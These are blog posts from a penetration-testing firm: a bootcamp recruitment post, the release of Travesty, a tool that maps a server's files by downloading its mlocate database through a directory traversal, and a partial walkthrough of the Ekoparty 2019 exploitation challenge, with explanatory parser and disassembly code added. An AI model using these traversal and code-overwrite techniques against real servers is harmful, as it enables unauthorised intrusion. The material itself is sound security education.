<div style="line-height: 100%; margin-bottom: 0cm;">
<i>I’m hooked on
hacking, I love the community and culture in this industry. I’m grateful to be where I am now and very excited about my future, although I would definitely and obviously prefer Telspace above any
other option as everything about it just fits perfectly - like it’s
too good to be true!</i> - Arno<br />
<i><br /></i>
<i>Loving the Bootcamp
so far, is like my second home</i> – Thaba<br />
<i><br /></i>
<i>I am super grateful
to be at Telspace because Information Security is my passion</i> - Edison</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<i>Being part of the
internship is interesting because I get to improve on the knowledge I
have while I could test my technical capabilities by exploiting
system vulnerabilities</i> - Thabiso
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<i>Cyber security plays
an important part in our day to day life</i> – Mothusi</div>
<br />
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
For those interested in entering the industry, we will be hosting
more boot camps in the future. If you would like to partake please
get in touch with us! </div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
In order to prepare yourself, the interview
process covers some of the following topics: Networking, Linux,
Windows, Cryptography, general information security knowledge, as
well as Software Development and Exploitation. We are certain that
our Boot Camp surpasses the industry “standard” thanks to the
following:</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
• Our interns
don’t have any monetary restraint attached to them, as they are
paid a monthly salary whilst undertaking the training with us.
Additionally, there are no restraints where the interns will have to
pay back money if they do not end up working for Telspace at the end
of the Boot Camp. Having an approach other than this would not
benefit our newcomers to the industry, nor the community at large.</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
• If interns are
uncertain that they are a good fit for the industry or at Telspace
Systems during the boot camp, then they are free to leave at any
time, taking what they have learnt with them, including any
certifications (and we are more than happy with that!).</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
• Should our
interns pass the strict criteria at the end of the boot camp, via
different assessment gateways (including a research component and
simulated penetration tests in various environments), then they will
be offered a 6 month contract as a junior analyst with Telspace
Systems (which they are not obliged to accept). If they do accept the
offer, then further certifications and training will be provided by
Telspace.</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
• This boot camp
is about growing the information security community, and thereafter,
our company; in order to provide our customers with the best possible
service.</div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0cm;">
<b>Telspace wishes each
new intern the very best of luck; we are eager to see the wonderful
research you complete as well as the many shells you will be popping!
</b></div>
Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-29647762845824761602019-11-05T14:49:00.000+02:002019-11-06T09:35:36.812+02:00Travesty – A directory and file enumeration tool (post directory traversal exploitation)<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;">About a year and a half ago, our team was working on an assessment where we had root access to a server via a directory traversal, but we couldn’t convert that to a working shell because of several restrictions on the server and a very strong password policy that was implemented i.e. /etc/shadow passwords could not be cracked during the assessment timeframe. We still knew that we had access to a very valuable target though.</span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">It became quite difficult for us to progress on the assessment, as we couldn’t see any files and directories on the server that might be unique to it. Taking this into account, Dino and Manny came up with the simple idea of downloading the mlocate database (luckily, we had the required privileges). The mlocate database is quite a mess if you open it directly in a text editor, but we were lucky enough to find pymlocate (<a href="https://github.com/salexan2001/pymlocate">https://github.com/salexan2001/pymlocate</a>), which assisted us in obtaining a really neatly formatted file of directory structures on the target machine. Thanks to Alexander Schlemmer (salexan2001) for creating it.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
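<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
To show why a readable mlocate database amounts to a full directory listing of the host, here is a minimal parser for the on-disk format documented in mlocate.db(5). It is an added example, not code from Travesty or pymlocate; the function names and the sample database built by build_sample() are constructed for illustration.</div>

```python
import struct

MAGIC = b"\x00mlocate"  # 8-byte magic from mlocate.db(5)


def _cstr(buf, pos):
    """Read a NUL-terminated string at pos; return (text, next offset)."""
    end = buf.index(b"\x00", pos)  # ValueError if the terminator is missing
    return buf[pos:end].decode("utf-8", "replace"), end + 1


def parse_mlocate(buf):
    """Parse raw mlocate.db bytes into (root, config, tree).

    tree maps each directory path to a list of (name, is_dir) entries.
    """
    if buf[:8] != MAGIC:
        raise ValueError("not an mlocate database")
    try:
        # Header: config block size (u32 BE), format version,
        # "require visibility" flag, then two padding bytes.
        conf_size, version, _visibility = struct.unpack_from(">IBB", buf, 8)
        if version != 0:
            raise ValueError("unsupported format version %d" % version)
        root, pos = _cstr(buf, 16)
        conf_end = pos + conf_size
        if conf_end > len(buf):
            raise ValueError("truncated configuration block")

        # Configuration block: name, values..., empty string as terminator.
        config = {}
        while pos < conf_end:
            name, pos = _cstr(buf, pos)
            values = []
            value, pos = _cstr(buf, pos)
            while value != "":
                values.append(value)
                value, pos = _cstr(buf, pos)
            config[name] = values

        tree = {}
        pos = conf_end
        while pos < len(buf):
            # Directory header: mtime seconds (u64 BE), nanoseconds (u32 BE),
            # four padding bytes, then the directory's full path.
            struct.unpack_from(">QI", buf, pos)
            dirname, pos = _cstr(buf, pos + 16)
            entries = []
            while True:
                kind = buf[pos]  # 0 = file, 1 = subdirectory, 2 = end of dir
                pos += 1
                if kind == 2:
                    break
                if kind not in (0, 1):
                    raise ValueError("unknown entry type %d" % kind)
                name, pos = _cstr(buf, pos)
                entries.append((name, kind == 1))
            tree[dirname] = entries
    except (IndexError, struct.error):
        raise ValueError("truncated mlocate database")
    return root, config, tree


def list_paths(tree):
    """Flatten the parsed tree into sorted full paths ('/' marks directories)."""
    paths = []
    for dirname, entries in tree.items():
        prefix = dirname.rstrip("/")
        for name, is_dir in entries:
            paths.append(prefix + "/" + name + ("/" if is_dir else ""))
    return sorted(paths)


def build_sample():
    """Build a small constructed database (not taken from any real host)."""
    def c(text):
        return text.encode() + b"\x00"

    def directory(path, entries):
        out = struct.pack(">QII", 1572800000, 0, 0) + c(path)
        for name, is_dir in entries:
            out += bytes([1 if is_dir else 0]) + c(name)
        return out + b"\x02"

    conf = (c("prune_bind_mounts") + c("1") + b"\x00"
            + c("prunepaths") + c("/tmp") + c("/proc") + b"\x00")
    head = MAGIC + struct.pack(">IBBH", len(conf), 0, 0, 0) + c("/")
    body = directory("/", [("etc", True), ("srv", True)])
    body += directory("/etc", [("passwd", False)])
    body += directory("/srv", [("app", True)])
    body += directory("/srv/app", [("config.yml", False),
                                   ("backup.tar.gz", False)])
    return head + conf + body


if __name__ == "__main__":
    root, config, tree = parse_mlocate(build_sample())
    print("root:", root, "config:", config)
    for path in list_paths(tree):
        print(path)
```
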
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">We then created our own tool, called Travesty, which allowed us to automate the entire process, requiring just the vulnerable traversal URL and an output filename. <o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">Utilising the tool has proved to be extremely useful over the course of this year on various assessments and it’s a great way to quickly find valuable information, files and directories on a target, that you wouldn’t normally know of on the machine.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">We’ve decided to release the small script to the public, in order to assist analysts in their day to day jobs – if it even helps one security analyst, we’re happy!<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><span lang="EN-US" style="font-family: inherit;">We’ve released the tool on our Github at:</span></span><br />
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><span lang="EN-US" style="font-family: inherit;"><br /></span></span>
<a href="https://github.com/telspacesystems/travesty/" style="font-family: "trebuchet ms", sans serif;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: large;">https://github.com/telspacesystems/travesty/</span></a><br />
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><here><br /></here></span>
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><here>There’s a lot of work to be done and things that we want to add to it, but for now it does the job (just!).</here></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">Usage:<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7uL4SsJoVUJTZUHtpVdNxHJ61zO4bd9rag56tBymAGxDLihc_r5-yWspjObmyMNY3fEuBE_w0YU5Be274kV2GXqb98zGIdyPbRknpEVzhBMeW4VA7jEKIjtzkm79gvza2C4f5G9QFPTTH/s1600/Screen+Shot+2019-11-03+at+8.56.41+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><img border="0" data-original-height="257" data-original-width="682" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7uL4SsJoVUJTZUHtpVdNxHJ61zO4bd9rag56tBymAGxDLihc_r5-yWspjObmyMNY3fEuBE_w0YU5Be274kV2GXqb98zGIdyPbRknpEVzhBMeW4VA7jEKIjtzkm79gvza2C4f5G9QFPTTH/s640/Screen+Shot+2019-11-03+at+8.56.41+PM.png" width="640" /></span></a></div>
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><br /></span>
</span><br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">In action screenshot:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6TS4rXrn-5hG_I0Ye1URlF98_V9LCE0MkcNWDInB_IXAbFUKrBZf0At45YaJVHMxZzTlX-UgO5DQzjy6w1FcmyBq6jpCZkhP0lmPZVS_vJJdZYrvLGe8HYGtqRFpwumGPm6PyHD8JfGjX/s1600/Screen+Shot+2019-11-03+at+8.57.37+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><img border="0" data-original-height="659" data-original-width="790" height="531" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6TS4rXrn-5hG_I0Ye1URlF98_V9LCE0MkcNWDInB_IXAbFUKrBZf0At45YaJVHMxZzTlX-UgO5DQzjy6w1FcmyBq6jpCZkhP0lmPZVS_vJJdZYrvLGe8HYGtqRFpwumGPm6PyHD8JfGjX/s640/Screen+Shot+2019-11-03+at+8.57.37+PM.png" width="640" /></span></a></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">Output formatting:<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitVuE1W-rCDiWzx0e6ilwSNB-xnen8BxMyP6lLgKu8BRlppTY05ZH9Vb7Y4-2sFde00r9v6SR9eX6_Q0A0CGJAC7vecibbubOdFgEZKxSQrxbTPsc7Z41zo3mKaxmJYXFxfNNJoR0VpBmG/s1600/Screen+Shot+2019-11-03+at+8.59.07+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><img border="0" data-original-height="762" data-original-width="728" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitVuE1W-rCDiWzx0e6ilwSNB-xnen8BxMyP6lLgKu8BRlppTY05ZH9Vb7Y4-2sFde00r9v6SR9eX6_Q0A0CGJAC7vecibbubOdFgEZKxSQrxbTPsc7Z41zo3mKaxmJYXFxfNNJoR0VpBmG/s640/Screen+Shot+2019-11-03+at+8.59.07+PM.png" width="609" /></span></a></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US"><span style="font-family: "trebuchet ms" , sans-serif; font-size: large;">Happy Hacking!</span><span style="font-family: "cambria";"><o:p></o:p></span></span></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2540168616552398462.post-9156227965337023632019-09-12T21:07:00.000+02:002019-09-13T09:50:13.377+02:00Solving the BFS Ekoparty 2019 Exploitation Challenge<div align="center" class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt; text-align: center;">
</div>
<div align="center" class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">This is a quick write-up about how one of our team members, Thanasis, solved the challenge for EkoParty 2019. This was a fun challenge and thanks to Lukas and Nico from Blue Frost Security for making it happen (and for supporting our community).</span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">More information about the challenge can be found at:</span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US"><a href="https://labs.bluefrostsecurity.de/blog/2019/09/07/bfs-ekoparty-2019-exploitation-challenge/" style="color: purple;"><span style="font-size: 14pt; line-height: 21.466665267944336px;">https://labs.bluefrostsecurity.de/blog/2019/09/07/bfs-ekoparty-2019-exploitation-challenge/</span></a></span><span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">According to the requirements provided, the application needs to run on Windows 10 x64 (RS6), and the goal is to bypass ASLR and execute a calc.exe process.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">By opening the application we can see via netstat that it binds on port 54321 on 0.0.0.0 (all the machine’s interfaces).<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">By opening Ghidra and going to the main function, it is obvious that some checks need to be bypassed in order to correctly send a payload to the application.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">In Ghidra, if we check the function that is called after the new connection is accepted, we see this:</span> </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjYJMt6NkMsa279VihQVTmRhfvSah6KkJI4_sJW2klLk1Gazwr_fyu9b0Y_QeEtan4IBAFdw9CCCIAvc8PPue1nWb7Wzl9HFzUKYk8sxzRVBzWjjn2JVVoNkYsO2koXvEtDleis_ggFbOh/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="927" data-original-width="975" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjYJMt6NkMsa279VihQVTmRhfvSah6KkJI4_sJW2klLk1Gazwr_fyu9b0Y_QeEtan4IBAFdw9CCCIAvc8PPue1nWb7Wzl9HFzUKYk8sxzRVBzWjjn2JVVoNkYsO2koXvEtDleis_ggFbOh/s400/1.png" width="400" /></a></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The first check looks at the first 0x10 bytes (16 chars) as a header. <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The second and third checks: if the header starts with 0x393130326f6b45 (Ekoparty2019), then we are allowed to send a user_message as long as it is smaller than 0x201 bytes (513 chars).<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The fourth and last check is quite important: we can send this whole packet structure, but it needs to be aligned correctly to 8 bytes, meaning we could send 16, 24, 32 and so on.</span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">After we succeed in sending a big buffer, it appears that the application crashes after 529 bytes or so. By sending 528 bytes structured correctly, with the cookie included at the beginning, we notice that before the call to function sub_140001170 we actually control RAX, which is the 513 bytes.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-family: "cmr12"; font-size: 12pt; line-height: 18.399999618530273px;">Before this, there is this instruction<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "cmr12"; font-size: 12pt;">lea rcx, unk_7FF6A8A9E520<o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-family: "cmr12"; font-size: 12pt; line-height: 18.399999618530273px;"> unk_7FF6A8A9E520, holds an array with this structure<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBANSs_l01wnnBjyI1GlGMBVN9uchk3Y-EAn4Rjvediibid1tBr7CmCw_BF39Il9MkYSqr-YbAdjg-z0A-ua5qPSCs6mGVP-RwC7j3ufv-F7s9cdcX_rjiDGdsNa49J8p0sHumESPCLQSo/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="324" data-original-width="1103" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBANSs_l01wnnBjyI1GlGMBVN9uchk3Y-EAn4Rjvediibid1tBr7CmCw_BF39Il9MkYSqr-YbAdjg-z0A-ua5qPSCs6mGVP-RwC7j3ufv-F7s9cdcX_rjiDGdsNa49J8p0sHumESPCLQSo/s400/2.png" width="400" /></a></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-family: "cmr12"; font-size: 12pt; line-height: 18.399999618530273px;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">By sending the 513 characters, for example as A or \x41 we can make it so the function will return our byte + the rest of the pattern. In this case c3c3c3c3 + ourbyte+488b01.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The function </span><span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">sub_140001170 before it returns this value turns it to little endian, making it ourbyte+488b01c3c3c3c3. So we get 41488b01c3c3c3c3.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">This value will be used in WriteProcessMemory as lpBuffer, basically copying these bytes into the function sub_7FF6A8A91000 as instructions, which lets us control what is executed when we reach it.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Although this is quite good, it limits the available instructions: we can only use instructions of the form byte+488b01c3c3c3c3.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">I made a quick script in Python producing all the values in a file:<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;"># Python 3: print every candidate value, one leading byte + the fixed bytes<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">byte=0x00<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">endbyte=0xff<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">start="488b01c3c3c3"<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">for i in range(byte,endbyte+1):<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">&nbsp;&nbsp;&nbsp;&nbsp;print(format(i,'02X')+start)&nbsp; # zero-padded so rasm2 gets whole bytes<o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">With a one-liner bash I got all the values:<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">for i in $(cat list_instructions);do echo -e "\n$i" && rasm2 -b 64 -D $i ; done > instructions<o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<br /></div>
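<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">To show why only some leading bytes keep the fixed mov rax,[rcx]; ret intact, here is an added example (not part of the original write-up) that decodes each candidate with a small x86-64 decoder instead of rasm2. It covers only segment overrides, REX bytes, push/pop, nop, ret and the register-indirect mov; the function names decode_one, decode and usable_leads are this example's own.</span></div>

```python
# Added example (not from the original post): a minimal x86-64 decoder for the
# subset of instructions that can appear in  lead + 48 8b 01 c3 c3 c3 c3.
SUFFIX = bytes.fromhex("488b01c3c3c3c3")      # fixed bytes quoted in the post
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"] + \
        ["r%d" % n for n in range(8, 16)]
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"] + \
        ["r%dd" % n for n in range(8, 16)]
# Segment-override prefixes; es/cs/ss/ds are ignored in 64-bit mode.
SEG_PREFIX = {0x26: "", 0x2E: "", 0x36: "", 0x3E: "", 0x64: "fs:", 0x65: "gs:"}


def decode_one(code, pos):
    """Decode one instruction at code[pos]; return (text, next_pos) or None."""
    seg, rex = "", 0
    while pos < len(code) and code[pos] in SEG_PREFIX:
        seg = SEG_PREFIX[code[pos]] or seg
        pos += 1
    # A REX byte only counts when it sits directly before the opcode, so of
    # several consecutive REX bytes the last one wins.
    while pos < len(code) and 0x40 <= code[pos] <= 0x4F:
        rex = code[pos]
        pos += 1
    if pos >= len(code):
        return None
    op = code[pos]
    pos += 1
    rex_w, rex_r, rex_b = (rex >> 3) & 1, (rex >> 2) & 1, rex & 1
    if op == 0xC3:
        return "ret", pos
    if op == 0x90 and not rex_b:
        return "nop", pos
    if 0x50 <= op <= 0x5F:
        name = "push" if op < 0x58 else "pop"
        return "%s %s" % (name, REG64[(op & 7) | (rex_b << 3)]), pos
    if op == 0x8B and pos < len(code):           # mov reg, r/m
        modrm = code[pos]
        pos += 1
        mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
        if mod != 0 or rm in (4, 5):             # disp/SIB/RIP forms: out of scope
            return None
        regs, size = (REG64, "qword") if rex_w else (REG32, "dword")
        dst = regs[reg | (rex_r << 3)]
        base = REG64[rm | (rex_b << 3)]
        return "mov %s, %s ptr %s[%s]" % (dst, size, seg, base), pos
    return None                                  # anything else: use a real disassembler


def decode(lead):
    """Decode lead + SUFFIX up to and including the first ret, or None."""
    code = bytes([lead]) + SUFFIX
    pos, out = 0, []
    while pos < len(code):
        step = decode_one(code, pos)
        if step is None:
            return None
        text, pos = step
        out.append(text)
        if text == "ret":
            return out
    return None


def usable_leads():
    """Map every lead byte this subset can decode to its instruction list."""
    found = {}
    for lead in range(0x100):
        listing = decode(lead)
        if listing is not None:
            found[lead] = listing
    return found


if __name__ == "__main__":
    for lead, listing in sorted(usable_leads().items()):
        print("%02x%s  %s" % (lead, SUFFIX.hex(), "; ".join(listing)))
```

<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Leading bytes outside this subset return None because they can absorb the following bytes as operands, which is where the rasm2 output is needed.</span></div>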
